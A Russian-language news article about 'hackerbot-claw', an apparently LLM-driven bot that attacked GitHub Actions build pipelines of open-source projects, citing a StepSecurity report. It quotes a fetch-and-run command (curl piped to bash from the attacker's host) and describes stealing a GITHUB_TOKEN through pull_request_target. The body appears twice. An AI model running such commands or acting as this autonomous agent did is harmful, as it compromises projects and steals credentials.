Забудьте про хакеров в капюшонах. Теперь ваши проекты ломает скрипт с криптокошельком в профиле
NewsMakerАвтономный бот взломал репозитории Microsoft и Datadog.
Согласно отчету StepSecurity, за последнюю неделю неизвестный бот с говорящим именем hackerbot-claw устроил настоящую охоту на популярные проекты с открытым кодом и показал, насколько уязвимой остаётся инфраструктура сборки. Автоматизированная программа методично искала слабые места в сценариях GitHub Actions и в ряде случаев добилась удалённого выполнения кода, а где-то и полного захвата репозитория.
Атаки продолжались с 21 по 28 февраля 2026 года. Учётная запись hackerbot-claw, созданная 20 февраля, называла себя «автономным агентом по исследованию безопасности» на базе языковой модели и даже указывала криптокошельки для пожертвований. За неделю бот открыл более десяти запросов на включение изменений и целенаправленно проверял сценарии сборки в репозиториях, связанных с Microsoft, Datadog, Cloud Native Computing Foundation, а также в крупных независимых проектах.
Общая схема выглядела одинаково. Бот создавал ветку или запрос на включение изменений, добивался запуска автоматической проверки и подсовывал вредоносную команду вида curl -sSfL hackmoltrepeat.com/molt | bash. Дальше сценарий сборки сам запускал код злоумышленника внутри среды непрерывной интеграции. В пяти из семи случаев атаки сработали полностью или частично.
Самый болезненный эпизод произошёл в репозитории avelino/awesome-go, одном из самых популярных списков проектов на Go. Бот воспользовался типичной ошибкой конфигурации, когда событие pull_request_target даёт сценарию доступ к секретам основного репозитория, но при этом система загружает код из внешней ветки. Вредоносный код добавили в функцию init() служебного Go-скрипта проверки качества. При сборке функция выполнилась автоматически и отправила токен GITHUB_TOKEN с правами записи на внешний сервер. Логи подтвердили, что проверка прошла успешно, а шаг выполнялся заметно дольше обычного. Украденный токен позволял менять код и объединять запросы на включение изменений.
Согласно отчету StepSecurity, за последнюю неделю неизвестный бот с говорящим именем hackerbot-claw устроил настоящую охоту на популярные проекты с открытым кодом и показал, насколько уязвимой остаётся инфраструктура сборки. Автоматизированная программа методично искала слабые места в сценариях GitHub Actions и в ряде случаев добилась удалённого выполнения кода, а где-то и полного захвата репозитория.
Атаки продолжались с 21 по 28 февраля 2026 года. Учётная запись hackerbot-claw, созданная 20 февраля, называла себя «автономным агентом по исследованию безопасности» на базе языковой модели и даже указывала криптокошельки для пожертвований. За неделю бот открыл более десяти запросов на включение изменений и целенаправленно проверял сценарии сборки в репозиториях, связанных с Microsoft, Datadog, Cloud Native Computing Foundation, а также в крупных независимых проектах.
Общая схема выглядела одинаково. Бот создавал ветку или запрос на включение изменений, добивался запуска автоматической проверки и подсовывал вредоносную команду вида curl -sSfL hackmoltrepeat.com/molt | bash. Дальше сценарий сборки сам запускал код злоумышленника внутри среды непрерывной интеграции. В пяти из семи случаев атаки сработали полностью или частично.
Самый болезненный эпизод произошёл в репозитории avelino/awesome-go, одном из самых популярных списков проектов на Go. Бот воспользовался типичной ошибкой конфигурации, когда событие pull_request_target даёт сценарию доступ к секретам основного репозитория, но при этом система загружает код из внешней ветки. Вредоносный код добавили в функцию init() служебного Go-скрипта проверки качества. При сборке функция выполнилась автоматически и отправила токен GITHUB_TOKEN с правами записи на внешний сервер. Логи подтвердили, что проверка прошла успешно, а шаг выполнялся заметно дольше обычного. Украденный токен позволял менять код и объединять запросы на включение изменений.